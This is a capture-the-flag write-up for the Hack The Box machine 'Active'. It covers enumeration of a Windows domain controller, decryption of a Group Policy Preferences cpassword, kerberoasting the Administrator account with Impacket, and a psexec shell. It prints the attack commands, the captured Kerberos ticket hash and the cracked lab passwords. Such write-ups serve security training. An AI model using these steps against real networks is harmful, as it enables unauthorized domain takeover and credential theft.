Hack The Box: Active write-up
Post
Cancel

# Hack The Box: Active machine write-up

Most people say this machine was close to real world pentesting. IMO it was really cool as for the first part it shows a “common” misconfiguration with Group Policy Preferences keys which lead to user, while the second one was based on taking advantage of a kerberos vulnerability that lets anyone get the hash of the domain admin and, after cracking it, impersonate him.

The machine is running on port 10.10.10.100.

### Enumeration I

Firstly, I enumerate open ports to discover the services running in the machine. I ran the following:

1 nmap -sV -sC -Pn -oA nmap/initial 10.10.10.100 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-02 20:36 CET Nmap scan report for active (10.10.10.100) Host is up (0.030s latency). Not shown: 983 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Windows 2003 Kerberos (server time: 2018-11-02 19:36:46Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows_98 Host script results: |_smbv2-enabled: Server supports SMBv2 protocol Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.96 seconds 

Looks like we have SMB running on port 445, so let’s check it! We can run smbclient to see the shares available to us.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 parallels@ubuntu:~/Desktop/Active$smbclient -N -L //10.10.10.100 Anonymous login successful Domain=[ACTIVE] OS=[] Server=[] Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) NetBIOS over TCP disabled -- no workgroup available 

### Enumeration II

Replication was one of the two directories that could be accessed anonymously, so I started looking at things and eventually came across an interesting path: replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml.

Contents of Groups.xml

1 2 3 <?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User> </Groups> 

We notice these particular fields: cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9gu KOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" and userName="active.htb\SVC_TGS".

### Getting user

The encrypted password we’ve just found are there due to Group Policy Preferences (GPP), which are a tool designed to set local accounts with embedded passwords so that there is no need to store the passwords plaintext in scripts. The flaw is that it is vulnerable, as it stores the password publicly to any anonymous user logged in SMB and Microsoft releases the key used to encrypt the password.

We can just install a tool called gpp-decrypt with the following command:

1 git clone https://github.com/BustedSec/gpp-decrypt 

Then we just need to edit the source code to change the encrypted string and run it with ruby gpp-decrypt. We get that our password is GPPstillStandingStrong2k18. Therefore, now we can authenticate in SMB with the following credentials: SVC_TGS:GPPstillStandingStrong2k18.

Mounting the directory and accessing SVC_TGS/user.txt

### Privilege Escalation

I started looking around in the new directories I had access to but couldn’t find anything useful. I was really frustrated and didn’t know what else to do so I asked for advise and someone told me to have a look at other services that nmap had found, especially kerberos. So down I got to research about kerberos vulnerabilities and finally came across something interesting.

Apparently, kerberos is a piece of software that is used to authenticate users that want to run a service. It does so by generating a key, called ticket, and then exchanging it with the client. However, there is a vulnerability called kerberoasting which is based on requesting the ticket and then decrypting it offline to log in legitimately later to the service. Besides, I found a tool called Impacket written in python that can do this for us and get us the encrypted ticket.

1 2 3 4 5 6 7 8 9 10 11 parallels@ubuntu:~/Desktop/Active/impacket$python GetUserSPNs.py -dc-ip 10.10.10.100 ACTIVE.htb/SVC_TGS -request Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-11-02 16:56:57$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$2f75c354c3b09ccebf087df4d37b98f2$1896509717f4959e51faa4f1f2b6d3bec31f3a9d70e6f1011549cc60a36fb9a698193c6e1b6087cdb8e5c491231192d781a15aad1710bc51c8014d8e0282b6c79109e9b23476ff7eca1fe069a82998d256abff560495fdf38e4de09f952d25e9c4d2f448519fc52ce87da9d35d0539394221a0df126117d04b08beb5f73e3f70089517f6acca53d2133cb7b2e2893830636aab1e0bb35217b355d89ecee106169b56d1d5f0bfc7fb15ba99b6a3acdc51021a9d08bb3d972606e1b1c5977f5fae5aad8ba11ce86671840ece56b8a5572989e767e24091e15e80855c9d91369c9df70cb1ecb6194b46f0b191405a7e571cf5d4e53b41fcab85d5fda3c0ff0866371e12cb33de205a24934dfa12ca41a7768a8faedccba4f0e47a5ce8c239143b0f3c271ac45d17ffcacd95ce5bf49c993ebc9c95f00a5536344c96eddcac99e0f3bd9a20db39d11e60e673dc4ad86e70a12487ce301e747a3cdd932713609c2eb7db79bc7f1fac539d3c26a916f6bec66188b4d6c582e5cee046999c9ea7688afd45a0e24f3a031e8f024718c1f5ac4b2bf3395c743b14f7b0f1dd1c957d8585a3ffec10a3d356e267771a443309f8f52a685dce22a54d1a2b700f16522b1d7b901ecbc9527d2b3162036b8fb78b9de67e94e346f9d747b1b1fe2bf0da2efbf0a7a84f1ab09d80324a9c286dd8a403f24d6f9803b78f5a09b05b917f01842be62a6f84bbecba62edf63b0304274ac255e432ee4881bd3a8d1e129e8cba47433135a17d0e967eb135e4d9711bc5dda2294932b76328aa295f57b006c34f11c454c8fdda93cc3d35b4d0eb48b3716fd150aee35994a4404b4fe1d9a60b783abdcbeea769b8681a450c0e1206850a6180fa6ddcad6fc04e6f70f93dc2e5e9c89a245c86627347a9270d1b7469ff6ba5757a172e827472c2d87bcd5a9480efa24e1d83e5327a94f8be7249a6840590b5a4da9a18eeb60c55704e71648328aa121def51d6e56a09253f6dcb18b5fc7679a7a63b26f520c7d37add04480dc6cd03f845cbfa7006d75262b57faba1fcf649dda4c880784692607c02f02580ddaa4ccad213c4b2e3a4fd6c5d7d91bc8738621cfe2bfee2df136942800115d9c148b1a7494a82beb5652da6ff6193874ff67cca80c5d117c55472c6b22997faf039041a597de81cebd6118b85b349436e81a8d37ea611d2422be9d3106fbcf8337ad6c8d65890aacab40953b4f930425d0ca7bd69df79d93b23198196c096d8 

Once we have the hash we just need to decrypt it! I used John The Ripper although hashcat is also ok.

Cracking the key with JtR

We have our Administrator password! Now let’s mount the shares again with admin credentials: Administrator:Ticketmaster1968.

Getting root hash

### Getting a root shell

However, I always like to get a nice shell, so even with the hash the box wasn’t completed!

To get the shell I used another example from Impacket repo, this one called psexec.py (you can find the format of the parameters by doing psexec.py –help).

Getting root shell

And with NT authority we’re like root, so our job here is done!